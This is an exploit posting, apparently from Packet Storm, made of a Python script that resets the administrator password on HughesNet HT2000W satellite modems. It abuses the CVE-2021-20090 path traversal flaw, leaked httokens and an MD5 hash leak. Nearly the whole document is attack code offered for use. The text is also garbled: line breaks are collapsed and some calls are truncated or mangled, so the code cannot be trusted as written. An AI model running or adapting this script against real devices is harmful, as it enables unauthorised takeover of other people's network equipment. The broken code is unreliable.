

HughesNet HT2000W Satellite Modem Password Reset

HughesNet HT2000W Satellite Modem remote password reset exploit that leverages a path traversal vulnerability.

Packet Storm
# Exploit Title: HughesNet HT2000W Satellite Modem (Arcadyan httpd 1.0) - Password Reset# Date: 7/16/24# Exploit Author: Simon Greenblatt <simongreenblatt[at]># Vendor: HughesNet# Version: Arcadyan httpd 1.0# Tested on: Linux# CVE: CVE-2021-20090import sysimport requestsimport reimport base64import hashlibimport urllibred = "\033[0;41m"green = "\033[1;34;42m"reset = "\033[0m"def print_banner():    print(green + '''    _____________   _______________         _______________   ________  ____          _______________  _______  _______________        \_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/_   |         \_____  \   _  \ \   _  \/   __   \   _  \       /    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/ |   |  ______  /  ____/  /_\  \/  /_\  \____    /  /_\  \      \     \____\     /   |        \ /_____/ /       \  \_/   \/       \ |   | /_____/ /       \  \_/   \  \_/   \ /    /\  \_/   \      \______  / \___/   /_______  /         \_______ \_____  /\_______ \|___|         \_______ \_____  /\_____  //____/  \_____  /             \/                  \/                  \/     \/         \/                      \/     \/       \/               \/  \n''' + reset)    print("                           Administrator password reset for HughesNet HT2000W Satellite Modem")    print('''    Usage: python3 <password> <ip_address>    <password>:   The new administrator password    <ip_address>: The IP address of the web portal. If none is provided, the script will default to\n    This script takes advantage of CVE-2021-20090, a path traversal vulnerability in the HTTP daemon of the HT2000W modem to reset    the administrator password of the configuration portal. It also takes advantage of other vulnerabilities in the device such as    improper use of httokens for authentication and the portal allowing the MD5 hash of the password to be leaked.''')    return Nonedef get_httoken(ip_address):    # Make a GET request to system_p.htm using path traversal    r = requests.get(f'http://{ip_address}/images/..%2fsystem_p.htm')    if r.status_code != 200:        print(red + f"(-) Failure: Could not request system_p.htm" + reset)        exit()    # Extract the httoken hidden in the DOM and convert it from Base64    return base64.b64decode('AAAIBRAA7(.*?)"', r.text).group(1)).decode('ascii')def encode_pass(password):    # Vigenere Cipher    key = "wg7005d"    enc_pass = ""    idx = 0    for c in password:        enc_pass += str(ord(c) + ord(key[idx])) + "+"        idx = (idx + 1) % len(key)    return enc_passdef change_pass(ip_address, httoken, enc_pass):    # Create a POST request with the httoken and the encoded password    headers = {'Content-Type': 'application/x-www-form-urlencoded', 'Referer': f'http://{ip_address}/system_p.htm'}    payload = {'action': 'ui_system_p', 'httoken': httoken, 'submit_button': 'system_p.htm', 'ARC_SYS_Password': enc_pass}    payload = urllib.parse.urlencode(payload, safe=':+')    try:        r ='http://{ip_address}/images/..%2fapply_abstract.cgi', data = payload, headers = headers)    except:        pass    return Nonedef verify_pass(ip_address, new_pass):    # Make a GET request to cgi_sys_p.js to verify password    httoken = get_httoken(ip_address)    headers = {'Referer': f'http://{ip_address}/system_p.htm'}    r = requests.get(f'http://{ip_address}/images/..%2fcgi/cgi_sys_p.js?_tn={httoken}', headers = headers)    if r.text.split('"')[5] != hashlib.md5(bytes(new_pass, 'ascii')).hexdigest():        print(red + "(-) Failure: Could not verify the hash of the password" + reset)        exit()def main():    if not (len(sys.argv) == 2 or len(sys.argv) == 3):        print_banner()        return    new_pass = sys.argv[1]    ip_address = ""    if sys.argv == 3:        ip_address = sys.argv[2]    httoken = get_httoken(ip_address)    print(f"[+] Obtained httoken: {httoken}")    enc_pass = encode_pass(new_pass)    change_pass(ip_address, httoken, enc_pass)    print(f"[+] Password reset to: {new_pass}")    verify_pass(ip_address, new_pass)    print("[+] Verified password hash: " + hashlib.md5(bytes(new_pass, 'ascii')).hexdigest())    print("[+] Password successfully changed!")    returnif __name__ == '__main__':    main()

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